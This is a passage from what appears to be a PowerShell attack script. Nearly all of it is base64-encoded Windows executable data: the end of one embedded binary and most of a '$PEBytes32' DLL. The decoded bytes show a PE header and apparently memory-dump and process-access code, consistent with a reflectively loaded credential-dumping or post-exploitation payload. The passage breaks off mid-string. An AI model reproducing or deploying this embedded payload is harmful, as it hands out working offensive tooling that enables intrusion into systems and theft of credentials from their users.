jiKOQo5ijoKOoo7CjuKPAo8ij0KPgo/ijAKQYpDCkOKRApEikUKRYpGCkaKRwpHikgKSIpJCkmKSgpKiksKS4pMCkyKTQpNik4KTopPCk+KQApQilEKUYpSClKKUwpTilQKVIpVClWKVgpWilcKV4pYCliKWQpZiloKW4pdCl2KXgpeil8KUIpiCmKKYwpjimQKZIplCmWKZgpmimcKaIpqCmqKawprimwKbIptCm2Kbgpuim8Kb4pgCnCKcQpxinIKcwpzinSKdQp2CnaKd4p4CnmKegp6insKe4p8CnyKfQp9in4Kfop/Cn+KcAqAioEKgYqDCo4KjwqPioAKkQqRipMKk4qVCpWKlwqXipgKmQqZipoKmwqbipwKnQqdip8Kn4qRCqGKowqjiqUKpYqnCqeKqQqpiqsKq4qsCq0KrYquCq8Kr4qhCrGKswqzirQKtIq1CrWKtgq2ircKt4q5CrsKu4q8CryKvQq9ir4Kvoq/Cr+KsArAisEKwYrCCsKKwwrDisQKxIrGCsaKxwrICskKygrLCswKzQrOCs8KwArQitEK0YrSCtKK0wrTitQK1IrVCtWK1grWitcK14rYCtiK2QrZitoK2orbCtuK3ArdCt4K3wrQCuEK4grjCuQK5QrmCucK6ArpCuoK6wrsCu0K4ArwivEK8YryCvKK8wrzivQK9Ir1CvWK9gr2ivcK94r4ivkK+Yr6CvqK+wr7ivwK/Ir9Cv2K/gr+iv8K/4rwAAACACACgAAAAAoAigEKAYoCCgKKAwoDigQKBIoFCgWKBgoHCgeKCAoABgAwCcAAAAEKAYoCigIKMoozijgKPQoyCkYKRopHikwKQApQilGKWApdClIKZgpmimeKawprimyKYQp1CnWKdop5inoKeop8CnEKhgqLCoAKlAqVip0KkgqnCqwKoQq2CroKu4q/Cr+KsIrGCssKwArVCtoK3wrTCuOK5ArkiuUK5YrmCuaK5wrniugK6IrpCumK7grjCvgK/QrwBwAwDEAAAAIKBgoGig4KDwoDChQKGAoZCh0KHgoSCiMKLAotCiEKMgo2CjcKOwo8Cj8KP4owCkCKQQpBikIKRwpMCkEKVwpYClsKW4pcClyKXQpdil4KXopTinSKeIp5in2KfopyioOKh4qIioyKjYqBipKKloqXipuKnIqQiqGKpYqmiqqKq4qviqCKtIq1irmKuoq+ir+Ks4rEisiKyYrNis6KworTiteK2Ircit2K0YriiuaK54rgCvUK+gr+CvAAAAgAMAoAAAABCgGKAgoCigMKA4oFCgYKCgoLCg8KAAoTChOKFAoUihUKFYoWChaKFwoeCh8KEwokCigKKQotCi4KJAo1CjkKOgo+CjMKSApAClEKVQpWCloKWwpfClAKY4pnCmeKaApoimkKaYpqCmqKawprimwKbIptCm2Kbgpuim8Kb4pgCnEKcYpyCnKKcwpzinQKdIp1CnWKdgp2inAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\"\n    $PEBytes32 = \"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